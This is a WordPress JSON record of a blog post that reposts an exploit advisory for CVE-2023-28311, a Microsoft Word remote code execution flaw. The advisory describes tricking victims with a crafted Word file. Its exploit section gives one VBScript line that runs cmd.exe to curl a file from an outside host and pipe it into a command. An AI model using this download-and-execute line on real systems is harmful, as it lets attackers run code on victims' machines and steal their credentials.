{"id":40381,"date":"2023-04-14T20:42:36","date_gmt":"2023-04-14T16:42:36","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171882\/msword-exec.txt"},"modified":"2023-04-15T01:26:00","modified_gmt":"2023-04-14T20:56:00","slug":"microsoft-word-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/microsoft-word-remote-code-execution\/","title":{"rendered":"Microsoft Word Remote Code Execution"},"content":{"rendered":"<p>## Title: Microsoft Word Remote Code Execution Vulnerability<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 04.14.2023<br \/>\n## Vendor: https:\/\/www.microsoft.com\/<br \/>\n## Software:<br \/>\nhttps:\/\/www.microsoft.com\/en-us\/microsoft-365\/word?activetab=tabs%3afaqheaderregion3<br \/>\n## Reference:<br \/>\nhttps:\/\/www.crowdstrike.com\/cybersecurity-101\/remote-code-execution-rce\/<br \/>\n## CVE-2023-28311<\/p>\n<p>## Description:<br \/>\nThe attack itself is carried out locally by a user with authentication to<br \/>\nthe targeted system. An attacker could exploit the vulnerability by<br \/>\nconvincing a victim, through social engineering, to download and open a<br \/>\nspecially crafted file from a website which could lead to a local attack on<br \/>\nthe victim&#8217;s computer. The attacker can trick the victim to open a<br \/>\nmalicious web page by using a `Word` malicious file and he can steal<br \/>\ncredentials, bank accounts information, sniffing and tracking all the<br \/>\ntraffic of the victim without stopping &#8211; it depends on the scenario and etc.<\/p>\n<p>STATUS: HIGH Vulnerability<\/p>\n[+]Exploit:<br \/>\nThe exploit server must be BROADCASTING at the moment when the victim hit<br \/>\nthe button of the exploit!<\/p>\n<p>&#8220;`vbs<br \/>\nCall Shell(&#8220;cmd.exe \/S \/c&#8221; &amp; &#8220;curl -s<br \/>\nhttp:\/\/tarator.com\/ChushkI\/ebanie.tarator | tarator&#8221;, vbNormalFocus)<br \/>\n&#8220;`<\/p>\n<p>## Reproduce:<br \/>\n[href](<br \/>\nhttps:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/2023\/CVE-2023-28311)<\/p>\n<p>## Reference:<br \/>\n[href](https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2023-28311)<\/p>\n[href](<br \/>\nhttps:\/\/www.crowdstrike.com\/cybersecurity-101\/remote-code-execution-rce\/)<\/p>\n<p>## Proof and Exploit<br \/>\n[href](https:\/\/streamable.com\/s60x3k)<\/p>\n<p>## Time spend:<br \/>\n01:00:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Microsoft Word Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 04.14.2023 ## Vendor: https:\/\/www.microsoft.com\/ ## Software: https:\/\/www.microsoft.com\/en-us\/microsoft-365\/word?activetab=tabs%3afaqheaderregion3 ## Reference: https:\/\/www.crowdstrike.com\/cybersecurity-101\/remote-code-execution-rce\/ ## CVE-2023-28311 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40381","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40381"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40381\/revisions"}],"predecessor-version":[{"id":40382,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40381\/revisions\/40382"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}